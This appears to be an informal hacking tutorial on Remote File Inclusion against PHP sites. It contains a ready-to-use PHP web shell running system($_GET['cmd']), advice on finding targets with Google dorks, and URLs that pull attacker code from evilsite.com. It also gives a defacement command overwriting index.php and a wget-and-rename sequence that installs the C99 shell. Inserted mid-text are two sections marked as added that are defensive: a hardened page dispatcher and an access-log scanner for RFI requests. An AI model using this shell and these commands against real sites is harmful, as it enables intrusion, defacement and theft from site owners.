RFI
stands for Remote File Inclusion. A well-known payload people push through RFI is the bloated "C99" script. As good as that script is, it's not practical: it's too big and fills the access logs. It's highly noticeable.
What is the point of it?
Contrary to popular belief, not all website hacking is SQL injection. RFI is so dangerous because it gives access to, and the ability to edit, every file the web server process can reach; it makes defacements and stealing classified material as easy as ... wget?
What do I need to be able to do this?
Well, basically: a web browser, a simple PHP RFI script (I will show you a simple one) and some basic knowledge of bash (most servers are Linux/Unix, so you will probably need this).
Lets go. Okay!
So, to start with we need a vulnerable site... How do you find these?
Well, a g00gle d0rk can help you... a lot. RFIs work by tricking the server into downloading and executing code that is not actually on it. Say a website was
http://shittysite.com/index.php?page=about
This could be a site that pulls in .txt documents to display as pages. Very, very insecure, yet people still do it. Anyway, if this uses the PHP include function we can exploit it... How?
http://shittysite.com/index.php?page=http://evilsite.com/ourscript.txt
Now this could work, and it could work quite well. If the site is vulnerable something will happen, but I will get into what in a minute.
So, you might have noticed that I added the .txt extension. This might not work, as the ?page=about had no .txt extension. This could be because the script automatically appends the .txt file extension (the error you will get is something about it not being able to include ourscript.txt.txt). Since it is appending .txt we can just put ourscript and it will still work. However, if it auto-appends something along the lines of .php then we have to use a null byte, which is .
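To make the mechanism concrete from the defender's side, here is an added illustration (not code from the original post) of the kind of page= dispatcher just described, with a hardened version next to it. The directory layout (a pages/ folder holding about.txt and so on) and the page names are assumptions for the example.

```php
<?php
// Added illustration, not code from the original post.
//
// --- Vulnerable pattern (the kind of dispatcher described above) ---
//   include($_GET['page'] . '.txt');
// With allow_url_include=On, ?page=http://evilsite.com/ourscript makes PHP
// fetch and execute remote code. Appending ".txt" does not prevent that,
// and a missing allowlist also lets attackers point at local files.
//
// --- Hardened version ---
// 1. Map page names to files with a fixed allowlist; never build the path
//    from the raw parameter.
// 2. Resolve the final path and confirm it is still inside the pages directory.
// 3. Keep allow_url_include=Off in php.ini (the PHP default) so include()
//    cannot fetch http:// or ftp:// targets at all.
// 4. Since the pages are plain text, emit them with readfile() instead of
//    include(), so any <?php tag inside a page file is never executed.

const PAGES_DIR = __DIR__ . '/pages';   // assumed layout: pages/about.txt etc.

const ALLOWED_PAGES = [
    'home'    => 'home.txt',
    'about'   => 'about.txt',
    'contact' => 'contact.txt',
];

/**
 * Return the absolute path of an allowlisted page, or null if the request
 * names an unknown page or resolves outside PAGES_DIR.
 */
function resolvePage(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;                                  // unknown page name
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;                                  // directory or file missing
    }
    // Defence in depth: even an allowlisted entry must resolve under pages/.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['page'] ?? 'home';
$file = resolvePage($requested);
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}

header('Content-Type: text/plain; charset=utf-8');
readfile($file);
```

The important property is that the request parameter is only ever used as a lookup key into ALLOWED_PAGES, so neither a URL, a .txt suffix trick nor a null byte in page= can change which file is opened. With allow_url_include=Off as a second layer, include() refuses remote targets even if a developer later reintroduces the raw-parameter pattern somewhere else.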
Okay, so what do we actually put into ourscript.txt before we do this? Well, it could be something like the C99, but unless that script is uploaded rather than included you will get a ton of errors and none of the features will work. So instead we have to build our own little script to get this baby working.
Code :
<?php
echo "<script>alert(1337);</script>";
echo "Executing command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);
?>
Something like that will work, as we can send a command to the Linux/Unix server in bash, as well as test whether the site is RFI-vulnerable with the alert box.
Ok, so if it worked we are in luck, as we can now send a few commands to the server.
To start with, let's try to list all the documents in the current directory. Anyone who knows any bash will know that the list command is ls, not dir.
So we do:
http://shittysite.com/index.php?cmd=ls&page=http://evilsite.com/ourscript
That then passes the cmd parameter to our included script, which starts listing the documents... This is great! Now we can do anything, anything at all. We can deface the current page using something as simple as
cmd=echo This site got pwn3d by hacker > index.php
That will overwrite index.php and pwn it (or, in the case of a website with .txt extensions, you will want to put this into one of the .txt files).
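Because every step above travels in the query string, this traffic is exactly what the opening paragraph means by "fills the access logs": a page-style parameter carrying a full URL, often alongside a cmd= parameter. As an added example (not from the original post), here is a small PHP scanner that pulls those request shapes out of combined-format access log lines. The log lines are constructed for the example and the host names are placeholders.

```php
<?php
// Added example, not from the original post: flag access-log requests whose
// query parameters carry a remote URL (the RFI request shape) and note
// whether a cmd= parameter travelled with them.

// Constructed sample log lines (combined log format, placeholder hosts).
$sampleLog = <<<'LOG'
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=http://evilsite.example/ourscript.txt HTTP/1.1" 200 1024
203.0.113.7 - - [10/Oct/2023:13:55:45 +0000] "GET /index.php?cmd=ls&page=http%3A%2F%2Fevilsite.example%2Fourscript HTTP/1.1" 200 2048
198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?page=contact HTTP/1.1" 200 480
LOG;

/**
 * Return one record per query parameter whose (URL-decoded) value starts
 * with a remote scheme. Each record: ip, param, url, has_cmd.
 */
function findRfiAttempts(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        // Client IP and the request target between the quotes.
        if (!preg_match('/^(\S+) .*?"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
            continue;
        }
        $ip = $m[1];
        $target = $m[2];
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;                       // no query string, nothing to inspect
        }
        // parse_str URL-decodes, so %3A%2F%2F becomes :// before matching.
        parse_str(substr($target, $qpos + 1), $params);
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('#^(?:https?|ftp)://#i', $value)) {
                $hits[] = [
                    'ip'      => $ip,
                    'param'   => $name,
                    'url'     => $value,
                    'has_cmd' => isset($params['cmd']),
                ];
            }
        }
    }
    return $hits;
}

foreach (findRfiAttempts($sampleLog) as $h) {
    printf("%-14s param=%-6s cmd=%-3s remote=%s\n",
        $h['ip'], $h['param'], $h['has_cmd'] ? 'yes' : 'no', $h['url']);
}
// On the sample above this reports the two 203.0.113.7 requests and nothing
// for the ordinary page=about / page=contact lines.
```

The check is deliberately about request shape, not outcome: a 200 response does not prove the include succeeded, and a 500 does not prove it failed, so treat a hit as a prompt to inspect the application's include handling and the allow_url_include setting rather than as a confirmed compromise. Decoding the query before matching matters, since encoded schemes (%3A%2F%2F) are common in these requests.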
We can download, remove, rename, anything! But that means you need to know some bash. In case you don't, not all is lost! You can use 'wget' to download a C99 script.
Ok, so how do we do that?
cmd=wget http://evilsite.com/c99.txt
Now, as a .txt the script is going to be useless. We could use some LFI, but we aren't going to; we are just going to rename it!
mv
Simples..
cmd=mv c99.txt hacked.php
Now by just going to hacked.php the C99 will work and the site can be pwned that way.
This is just a simple tutorial, not too advanced. It's meant to give an overview of RFI, not a complete guide.